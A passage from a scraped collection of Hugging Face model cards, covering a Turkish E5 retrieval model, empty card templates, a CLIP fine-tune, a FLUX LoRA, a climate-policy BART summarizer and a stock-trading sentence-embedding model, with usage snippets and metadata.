- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
ytu-ce-cosmos/turkish-e5-large | ytu-ce-cosmos | 2025-05-30T10:19:36Z | 1,271 | 12 | null | [
"safetensors",
"xlm-roberta",
"Turkish",
"turkish",
"retrieval",
"passage-retrieval",
"feature-extraction",
"tr",
"arxiv:2307.14134",
"base_model:intfloat/multilingual-e5-large-instruct",
"base_model:finetune:intfloat/multilingual-e5-large-instruct",
"license:mit",
"region:us"
] | feature-extraction | 2025-04-11T07:50:37Z | ---
license: mit
language:
- tr
base_model:
- intfloat/multilingual-e5-large-instruct
tags:
- Turkish
- turkish
- retrieval
- passage-retrieval
pipeline_tag: feature-extraction
---
<img src="./static/cover.png" width=1024>
# Turkish-e5-Large
This is a finetune version of model intfloat/multilingual-e5-large-instruct with various Turkish datasets.
Recommended Instruct: "Given a Turkish search query, retrieve relevant passages written in Turkish that best answer the query"
## Example Usage
```python
from sentence_transformers import SentenceTransformer
def get_detailed_instruct(task_description: str, query: str) -> str:
return f'Instruct: {task_description}\nQuery: {query}'
# Görev: Web arama sorgusuna uygun bilgiyi içeren pasajları getir
task = 'Given a Turkish search query, retrieve relevant passages written in Turkish that best answer the query'
queries = [
get_detailed_instruct(task, 'Kolay bir kahvaltı tarifi nedir?'),
get_detailed_instruct(task, 'Dış mekan yürüyüşü için en iyi saat hangisidir?')
]
documents = [
"Güne enerjik başlamak için yulaf ezmesi, süt ve meyveyle hazırlanan basit bir kahvaltı hem pratik hem de besleyicidir. Üzerine biraz bal ve tarçın eklerseniz lezzeti artar.",
"Sabah saatleri, özellikle 07:00 ile 10:00 arası, açık havada yürüyüş yapmak için idealdir. Bu saatlerde hava daha serin ve temiz olur, ayrıca gün ışığı vücut ritmini destekler.",
"Türkiye'nin en uzun nehri Kızılırmak'tır. Sivas'tan doğar, Karadeniz'e dökülür ve yaklaşık 1.355 kilometre uzunluğundadır."
]
input_texts = queries + documents
model = SentenceTransformer('ytu-ce-cosmos/turkish-e5-large')
embeddings = model.encode(input_texts, convert_to_tensor=True, normalize_embeddings=True)
scores = (embeddings[:2] @ embeddings[2:].T) * 100
for i, query in enumerate(queries):
print(f"\nSorgu: {query.split('Query: ')[-1]}")
for j, doc in enumerate(documents):
print(f" → Belge {j+1} Skoru: {scores[i][j]:.2f}")
print(f" İçerik: {doc[:80]}...")
"""
Sorgu: Kolay bir kahvaltı tarifi nedir?
→ Belge 1 Skoru: 67.36
İçerik: Güne enerjik başlamak için yulaf ezmesi, süt ve meyveyle hazırlanan basit bir ka...
→ Belge 2 Skoru: 31.68
İçerik: Sabah saatleri, özellikle 07:00 ile 10:00 arası, açık havada yürüyüş yapmak için...
→ Belge 3 Skoru: 7.06
İçerik: Türkiye'nin en uzun nehri Kızılırmak'tır. Sivas'tan doğar, Karadeniz'e dökülür v...
Sorgu: Dış mekan yürüyüşü için en iyi saat hangisidir?
→ Belge 1 Skoru: 28.14
İçerik: Güne enerjik başlamak için yulaf ezmesi, süt ve meyveyle hazırlanan basit bir ka...
→ Belge 2 Skoru: 78.02
İçerik: Sabah saatleri, özellikle 07:00 ile 10:00 arası, açık havada yürüyüş yapmak için...
→ Belge 3 Skoru: 18.70
İçerik: Türkiye'nin en uzun nehri Kızılırmak'tır. Sivas'tan doğar, Karadeniz'e dökülür v...
"""
```
# Citations
```bibtex
@article{kesgin2023developing,
title={Developing and Evaluating Tiny to Medium-Sized Turkish BERT Models},
author={Kesgin, Himmet Toprak and Yuce, Muzaffer Kaan and Amasyali, Mehmet Fatih},
journal={arXiv preprint arXiv:2307.14134},
year={2023}
}
```
### Contact
COSMOS AI Research Group, Yildiz Technical University Computer Engineering Department <br>
https://cosmos.yildiz.edu.tr/ <br>
[email protected] <br> |
tungduong261204/DPO_5000_v2 | tungduong261204 | 2025-05-30T10:17:04Z | 0 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:unsloth/Llama-3.2-1B",
"base_model:adapter:unsloth/Llama-3.2-1B",
"region:us"
] | null | 2025-05-30T10:16:52Z | ---
base_model: unsloth/Llama-3.2-1B
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.2 |
nmndeep/CLIC-ViT-L-14-224-PixPr-RedCaps | nmndeep | 2025-05-30T10:16:47Z | 0 | 0 | open_clip | [
"open_clip",
"safetensors",
"region:us"
] | null | 2025-03-27T13:11:58Z |
# Model Card for CLIC-ViT-L-14-224-PixPr-RedCaps
## Model Details
<!-- Provide the basic links for the model. -->
- **Model-details:** : Fine-tuned with CLIC using PixelProse dataset
## Model Usage
### With OpenCLIP
```
import torch
from PIL import Image
import open_clip
model, _, image_processor = open_clip.create_model_and_transforms('hf-hub:nmndeep/CLIC-ViT-L-14-224-PixPr-RedCaps')
image = image_processor(Image.open(urlopen(
'https://images.pexels.com/photos/869258/pexels-photo-869258.jpeg?auto=compress&cs=tinysrgb&w=1260&h=750&dpr=1'))).unsqueeze(0)
model.eval()
tokenizer = open_clip.get_tokenizer('hf-hub:nmndeep/CLIC-ViT-L-14-224-PixPr-RedCaps')
texts= ["a diagram", "a dog", "a cat", "snow"]
text = tokenizer(texts)
with torch.no_grad(), torch.autocast("cuda"):
image_features = model.encode_image(image)
text_features = model.encode_text(text)
image_features /= image_features.norm(dim=-1, keepdim=True)
text_features /= text_features.norm(dim=-1, keepdim=True)
text_probs = (100.0 * image_features @ text_features.T).softmax(dim=-1)
idx = torch.argmax(text_probs)
print("Output label:", texts[idx])
``` |
Varinder2110/sonunigam-2 | Varinder2110 | 2025-05-30T10:16:29Z | 0 | 0 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2025-05-30T09:04:07Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: TOK
---
# Sonunigam 2
<Gallery />
## About this LoRA
This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI.
It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `TOK` to trigger the image generation.
## Run this LoRA with an API using Replicate
```py
import replicate
input = {
"prompt": "TOK",
"lora_weights": "https://huggingface.co/Varinder2110/sonunigam-2/resolve/main/lora.safetensors"
}
output = replicate.run(
"black-forest-labs/flux-dev-lora",
input=input
)
for index, item in enumerate(output):
with open(f"output_{index}.webp", "wb") as file:
file.write(item.read())
```
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('Varinder2110/sonunigam-2', weight_name='lora.safetensors')
image = pipeline('TOK').images[0]
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
## Training details
- Steps: 6000
- Learning rate: 0.0004
- LoRA rank: 64
## Contribute your own examples
You can use the [community tab](https://huggingface.co/Varinder2110/sonunigam-2/discussions) to add images that show off what you’ve made with this LoRA.
|
rziga/llmdet_large | rziga | 2025-05-30T10:16:20Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"mm-grounding-dino",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-05-30T10:13:53Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Zuellni/model-test-iv | Zuellni | 2025-05-30T10:15:20Z | 0 | 0 | null | [
"safetensors",
"8-bit",
"region:us"
] | null | 2025-05-30T08:29:53Z | Temporary Redirect. Redirecting to /Zuellni/model-20250530/resolve/main/README.md |
anonymous6435/llemma-isar-SH | anonymous6435 | 2025-05-30T10:14:38Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-30T09:24:00Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
AshwiniFromIITK/gemma-3-0_1b_NewDS3.0 | AshwiniFromIITK | 2025-05-30T10:13:57Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"gemma3_text",
"trl",
"en",
"base_model:unsloth/gemma-3-1b-it-unsloth-bnb-4bit",
"base_model:finetune:unsloth/gemma-3-1b-it-unsloth-bnb-4bit",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-05-30T10:12:37Z | ---
base_model: unsloth/gemma-3-1b-it-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- gemma3_text
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** AshwiniFromIITK
- **License:** apache-2.0
- **Finetuned from model :** unsloth/gemma-3-1b-it-unsloth-bnb-4bit
This gemma3_text model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
z-dickson/bart-large-cnn-climate-change-summarization | z-dickson | 2025-05-30T10:11:42Z | 201 | 3 | transformers | [
"transformers",
"pytorch",
"tensorboard",
"safetensors",
"bart",
"text2text-generation",
"politics",
"summarization",
"climate change",
"political party",
"press release",
"political communication",
"European Union",
"Speech",
"en",
"es",
"da",
"de",
"it",
"fr",
"nl",
"pl",
"license:afl-3.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | summarization | 2023-06-05T17:43:48Z | ---
tags:
- politics
- summarization
- climate change
- political party
- press release
- political communication
- European Union
- Speech
license: afl-3.0
language:
- en
- es
- da
- de
- it
- fr
- nl
- pl
metrics:
- rouge
widget:
- text: >-
In the light of the current spate of organised vandalism perpetrated in the
names of Eco This or Stop Something Else, haven’t we seen this kind of near
mass-hysterical action before? With certain obvious exceptions, most of the
activists appear to be in the teens to early twenties bracket, and of a
comfortable so-called middle-class group. In any event, they have been
persuaded that this business of ‘climate change’ which has steadily become
some sort of cult, is about to destroy all life as we know it. In reality,
the world’s climate has been changing since the ‘Big Bang’ and will continue
so to do until the whole thing eventually fizzles out. They have not yet
cottoned on to the fact that by far the biggest threat to human existence is
that of overpopulation. What is more disturbing, however, is the ease with
which they have been recruited into behaving as they do – with no regard to
everybody else’s opinions and wishes. Whether by disrupting a Snooker
Tournament, the Grand National, obstructing motorways or whatever else, it
is clear that there is a core group of these ‘eco’ fanatics who can be
directed to any place or event that somebody decides should be attacked,
whenever and wherever they choose. For this to happen, there has to be a
hierarchy at large, as opposed to and directing the cannon fodder who
actually make the mischief. As we have seen on various other occasions, it
is those ‘useful idiots’ who do the dirty work while the organisers stay
safely away and laugh at those gullible enough to take it all in, regardless
of the veracity of their cause’ or the consequences of their mindless
actions. This is not new by any means. The Nazis in pre-war Germany used
similar tactics involving some sort of brainwashing and intimidation, which
resulted in the emergence of Hitler Youth and we all know what a misguided
bunch they eventually turned out to be. Of more concern these days is the
potential for the organisers of these events to bring together at short
notice a substantial gang of activists who can be easily manipulated into
carrying out acts of serious civil disobedience against any stratum of
society they decide needs their form of correction or treatment. This is a
form of grooming however you look at it. Of course, there will be a
percentage who will duck out of any really serious civil disorder, but that
would still leave a substantial number of organised troublemakers who will
relish the thought of seizing some sort of power to affect political thought
or action. This is generally accompanied by those seeking to maximise damage
to public and private property. It is regrettable that the Courts have so
far failed to acknowledge this current spate of ochlocracy. Meanwhile, we
all have to put up with that troublesome element intent on testing the
boundaries of a decent democratic society.
example_title: 'English (Political party: UKIP)'
- text: >-
Die Bekämpfung illegaler Migration ist eine gemeinsame Priorität von
Österreich und Indien, gerade vor dem Hintergrund der dramatisch gestiegenen
Ankunftszahlen illegaler Migrantinnen und Migranten aus Indien im
vergangenen Jahr. Ausdruck dessen findet sich im Abkommen über eine
umfassende Migrations- und Mobilitätspartnerschaft, die Außenminister
Alexander Schallenberg und sein indischer Amtskollege, Subrahmanyam
Jaishankar, am Rande des EU-Indopazifik-Ministerforums in Stockholm
unterzeichnet haben. Damit wurde erstmals eine vertragliche Grundlage für
Rückführungen nach Indien geschaffen, die zusammen mit der erfolgten
Abschaffung der visafreien Einreise aus Indien nach Serbien, für die sich
Kanzler und Innenminister erfolgreich eingesetzt haben, zu einem noch
deutlicheren Rückgang der illegalen Migration aus Indien führen wird. Aber
es geht dabei nicht nur um die Bekämpfung von illegaler Migration, sondern
auch viel mehr um die Stärkung legaler Migrationsmöglichkeiten, insbesondere
für die Fachkräfte, die Österreich dringend benötigt. Hierbei soll zukünftig
zuerst Kontakt zwischen Firmen und den potentiellen Arbeitskräften
hergestellt werden, wobei die Zusammenarbeit zwischen staatlichen Agenturen
indischen Staatsangehörigen erleichtern soll, einen geeigneten Arbeitgeber
in Österreich zu finden. Ein verbesserter Austausch von Studierenden und
eine zügige Visavergabe, vor allem für Journalistinnen und Journalisten
sowie in der Wissenschaft ist ebenfalls vorgesehen. Für junge Menschen wird
darüber hinaus die Chance geschaffen, durch ein Working Holiday Programm im
Zielland kurze, befristete Arbeitsverhältnisse einzugehen oder
Bildungseinrichtungen ohne Beschäftigungsbewilligung zu nutzen.
Außenminister Alexander Schallenberg: „Das Abkommen ist ein Meilenstein in
unseren Beziehungen mit dem bevölkerungsreichsten Land der Welt. Es schafft
Möglichkeiten, indische Arbeitskräfte beispielsweise im Rahmen der
Rot-Weiß-Rot Karte nach Österreich zu bringen. Hochqualifizierte Inderinnen
und Inder können nun dort Lücken schließen, wo es in Österreich an
Arbeitskräften fehlt.“
example_title: 'German (Political party: Austrian People''s party)'
---
## Facebook/bart-large-cnn model
This model is intended to summarize political texts regarding climate change, the environment and energy. The model was fine-tuned on 7k political party press releases from 66 parties in 12 different countries and is intended to identify the primary issue of the press release, the position of the party on the primary issue, and a 1-2 sentence summary.
Training Data primarily consists of GPT-4 responses asking for summaries of the press releases. Small modifications were also made to the summaries from GPT-4 when validating the responses. I also made all the training text summaries lower case by accident, so outputs are lowercase.
**Note** The model is pretty good at identifying the primary issue of any text, but it'll refer to the author of the text as 'the party' and summarize the "position" of *the party* as such.
**Countries included in Training Data** = ['Italy', 'Sweden', 'Switzerland', 'Netherlands', 'Germany', 'Denmark', 'Spain', 'UK', 'Austria', 'Poland', 'Ireland', 'France']
Citation:
```
@article{dickson2024going,
title={Going against the grain: Climate change as a wedge issue for the radical right},
author={Dickson, Zachary P and Hobolt, Sara B},
journal={Comparative Political Studies},
year={2024},
publisher={SAGE Publications Sage CA: Los Angeles, CA}
}
``` |
iamleonie/leonies-test | iamleonie | 2025-05-30T10:10:09Z | 0 | 0 | sentence-transformers | [
"sentence-transformers",
"safetensors",
"bert",
"sentence-similarity",
"feature-extraction",
"generated_from_trainer",
"dataset_size:6448",
"loss:MultipleNegativesRankingLoss",
"en",
"dataset:yymYYM/stock_trading_QA",
"arxiv:1908.10084",
"arxiv:1705.00652",
"base_model:BAAI/bge-base-en-v1.5",
"base_model:finetune:BAAI/bge-base-en-v1.5",
"model-index",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] | sentence-similarity | 2025-05-30T10:09:26Z | ---
language:
- en
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- generated_from_trainer
- dataset_size:6448
- loss:MultipleNegativesRankingLoss
base_model: BAAI/bge-base-en-v1.5
widget:
- source_sentence: How are retail sales data integrated into trading models?
sentences:
- Lagged variables represent historical values of a time series variable and are
used in forecasting models to capture the impact of past observations on future
market trends, enhancing the accuracy of predictions by incorporating relevant
historical information.
- Retail sales data reflect consumer spending patterns and overall economic activity.
Traders analyze this indicator to gauge consumer confidence, sectoral performance,
and potential market trends related to retail-focused stocks.
- Regulatory approval for a new drug can have a positive impact on a pharmaceutical
company's stock price as it opens up new revenue streams and market opportunities.
- source_sentence: What impact does algorithmic trading have on market liquidity?
sentences:
- Volume analysis in stock trading involves studying the number of shares or contracts
traded in a security or market over a specific period to gauge the strength or
weakness of a price move.
- Social media sentiment analysis can assist in detecting anomalies in stock prices
by capturing public sentiment and opinions on stocks, identifying trends or sudden
shifts in sentiment that may precede abnormal price movements.
- Algorithmic trading can impact market liquidity by increasing trading speed, efficiency,
and overall trading volume, leading to potential liquidity disruptions during
certain market conditions.
- source_sentence: What considerations should traders take into account when selecting
an adaptive trading algorithm?
sentences:
- Historical price data helps analysts identify patterns and trends that can be
used to develop models for predicting future stock prices based on past performance.
- Traders should consider factors such as performance metrics, risk management capabilities,
adaptability to changing market conditions, data requirements, and the level of
transparency and control offered by the algorithm.
- A stock exchange is a centralized marketplace where securities like stocks, bonds,
and commodities are bought and sold by investors and traders.
- source_sentence: How can currency exchange rates and forex markets be integrated
into trading models alongside macroeconomic indicators?
sentences:
- Moving averages smooth out price data over a specified period, making it easier
to identify trends and reversals in stock prices.
- Currency exchange rates and forex markets are integrated into trading models to
assess currency risk, international trade impact, and cross-border investment
opportunities influenced by macroeconomic indicators.
- Investors use quantitative momentum indicators to identify securities that are
